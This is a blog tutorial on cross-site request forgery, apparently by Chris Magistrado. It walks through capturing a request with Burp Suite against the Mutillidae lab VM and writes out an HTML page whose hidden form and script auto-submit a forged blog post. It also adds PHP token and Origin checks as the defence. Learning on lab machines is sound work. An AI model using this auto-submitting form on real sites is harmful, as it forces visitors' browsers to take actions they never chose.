PoC || GTFO

Hacking Tutorials

(CSRF) Cross-Site Request Forgery


I've been playing around with web application security and wanted to do a writeup on CSRF (pronounced C-SURF). For those of you who are unfamiliar with CSRF, it is the act of getting a victim's browser to submit a POST form to a target site the attacker has chosen, by having the victim visit a site that carries your CSRF code. That probably sounded more complicated than it really is. Here are the general steps:

  1. Research the target site and see what params are in the request body.
  2. Write a <form> that has all the necessary params and values you want to submit.
  3. Place the code on a website your victim will go to.
  4. After they visit the site, they will submit the form.
  5. Profit.

Prerequisites: This tutorial will go over the most basic usage of Burp Suite. If you have never used Burp Suite before, this tutorial is for you! You should have some knowledge of how to set up a VM. I won't be going over that, and assume you can set up the OWASP Broken Web Apps VM and get to it via a browser. Same with MAMP.

Tools Used:
Firefox - A browser > Internet Explorer
Burp Suite - Setup local proxy to intercept browser traffic
MAMP (macOS, Apache, MySQL, PHP) - Launches a local Web Server (There's also WAMP for Windows and LAMP for GNU Linux)
OWASP Broken Web Applications - A very vulnerable Web Server for learning
Virtualbox - Virtualize the OWASP VM
Visual Studio Code (any IDE or text editor will work)


Network Configuration


Here is how our network is configured.

  • 192.168.56.101 - OWASP VM
  • 192.168.56.1 - Virtual Router and MAMP Server

Yours might look different. The only necessary thing is that both web servers can talk to each other.


Burp Suite Setup


Click Next.

Click Proxy > Options.

Make sure your proxy is checked. Nicely done!


Firefox Settings: Proxy


Go to Advanced > Network > Settings...

Set to Manual, 127.0.0.1 and port 8080.


Perfect. Now, given that both your MAMP and OWASP VM are running AND able to connect to one another, let's continue to gather information about the form. (I should warn: NEVER connect vulnerable VM boxes directly to the internet. The best configuration is to set up your Host OS (in this case, my Mac) and your Guest OS (the OWASP VM) on a virtual network. In VirtualBox, you can do this by clicking Settings > Network and setting the NIC to attach to a Host-only Adapter.)

If you want multiple VMs to talk with one another, you can simply put them on the same Host-only Adapter network. This is usually preferable, as it isolates the VMs from the actual internet.


Great! Now let's navigate to the CSRF portion of this VM. 



When your server is launched, you should see this page by putting its IP in your browser. We will be going through the Mutillidae II tutorial so click the button!

...but wait. Something's wrong. It didn't take us to the next page. It's taking forever and just hanging. This is because the request is hanging out in our Burp Suite Proxy! Let's take a look.

As you can see, here is our request.

By clicking the Forward button, the request is sent to the server and we can continue.


Now we will navigate to the CSRF page.
OWASP 2013 > A8 Cross-Site Request Forgery (CSRF) > Add to your blog
Don't forget to forward your request in your Burp Suite!

The next page will have blog posts of user "anonymous". This means the website allows for anyone to post blogs. Let's exploit the ability to post blogs via CSRF.


Now's the fun part! Let's post something as anon, and review the request. Cardi B lyrics seem appropriate as of Nov 14th, 2017. I'm sure this won't date well, but whatever. =]
Once we input our lyrics and click Save Blog Entry, we head over to our Burp Suite to see it catch the POST.

The bottom section is what we want. It's the params for the body. If you click Params on the top, you'll see what I mean.

These are the Parameters for the request. As you can see, we have 1 URL, 4 Cookie, and 3 Body params. We want the Body Params.


There is our post.


What we want to do here is gather all the information for the Body Params. In our case, it is the following:

  • csrf-token = NULL
  • blog_entry = "My pussy glitter as gold"
  • add-to-your-blog-php-submit-button = "Save Blog Entry"

Awesome! Along with the website's url, we now have all the information we need. Muahaha. Time to head over to our MAMP webserver and place a file in there.


Ima Basic Bitch.


Your front page will probably look different. I just changed my index.html file and put this there. We will now be creating the website that will force any user who visits the page to submit a blog post to the OWASP website. Programming time!

What we want to do is create a <form> with all the body params, and then create a <script> that submits the form.

Here, we need to supply the address of the website we want to POST to in the action for the form. Thereafter, we simply put the name and associated values for our form. 


<!-- Form Post -->
<form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
    <input type="hidden" name='csrf-token' value=''>
    <input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
    <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
</form>

Nice! The next step, is to add the JavaScript that will submit the form. Nothing too crazy. 


<script>document.csrf.submit();</script>

Sweet! Now just for some fun, I added a photo and a few words into the file I created, named blog.html. Here is the code, below.


<html>
<body>
    <center>
        <h1>Welcome to My Website!</h1>
        If you're reading this, you probably have been hacked.<br><br>
        <img src="http://weknowmemes.com/wp-content/uploads/2011/11/free-shrugs.jpg"><br>
        Sorry, not sorry.<br>

        <!-- Form Post -->
        <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
            <input type="hidden" name='csrf-token' value=''>
            <input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
            <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
        </form>
        <!-- The script must come after the form so document.csrf exists when it runs -->
        <script>document.csrf.submit();</script>
        <!-- End Form Post -->
    </center>
</body>
</html>

Let's go visit the website, and see what happens on OWASP's side! BUT BEFORE that, turn off the Intercept button on your Burp Suite Proxy. It makes things go smoother.


Success! We made the visitor to my MAMP website submit a form to the OWASP website!
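The reason this worked is visible in the captured request: the csrf-token body param was empty and the server accepted it anyway. As an added example (not Mutillidae's own code), here is what the missing server-side half of the add-to-your-blog page would look like, assuming PHP 7+ with sessions and the same field names the captured POST used:

```php
<?php
// Added example, not Mutillidae's code: bind a per-session token to the form
// and reject any POST whose token is empty, missing, or does not match.
session_start();

function csrf_token(): string {
    // One unguessable token per session, from the OS CSPRNG.
    if (empty($_SESSION['csrf-token'])) {
        $_SESSION['csrf-token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf-token'];
}

function csrf_request_is_valid(array $post, array $server, array $session): bool {
    // 1. The token must be present, non-empty, and equal to the session copy.
    //    hash_equals() is a constant-time comparison.
    $sent     = $post['csrf-token'] ?? '';
    $expected = $session['csrf-token'] ?? '';
    if ($sent === '' || $expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    // 2. Defence in depth: when the browser sends an Origin header it must be
    //    our own host. A form auto-submitted from the MAMP server arrives with
    //    Origin: http://192.168.56.1, which does not match 192.168.56.101.
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $ownHost    = preg_replace('/:\d+$/', '', $server['HTTP_HOST'] ?? '');
        if ($originHost === null || $originHost !== $ownHost) {
            return false;
        }
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_request_is_valid($_POST, $_SERVER, $_SESSION)) {
        http_response_code(403);
        exit('Rejected: missing/invalid CSRF token or cross-site origin.');
    }
    // ... save $_POST['blog_entry'] for the logged-in user here ...
}
?>
<!-- The form now carries the session token; a page on another origin cannot read it -->
<form action="index.php?page=add-to-your-blog.php" method="POST">
    <input type="hidden" name="csrf-token" value="<?= htmlspecialchars(csrf_token()) ?>">
    <textarea name="blog_entry"></textarea>
    <input type="submit" name="add-to-your-blog-php-submit-button" value="Save Blog Entry">
</form>
```

With this check in place the blog.html form above gets a 403, because the hidden csrf-token it sends is empty and its Origin is the MAMP host. Current browsers also default cookies to SameSite=Lax, which stops the victim's session cookie from riding along on a cross-site POST, but the token check is the control the server itself owns.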

Cons: One of the issues is that the visitor's browser is redirected to the site the form was submitted to. I attempted something like <script>window.location.replace("http://stackoverflow.com");</script>
But it didn't seem to work. Maybe there's a way to submit a request but also have the site send you back to the form site? But then there'd be a loop... Any insight on this would be appreciated!


Chris Magistrado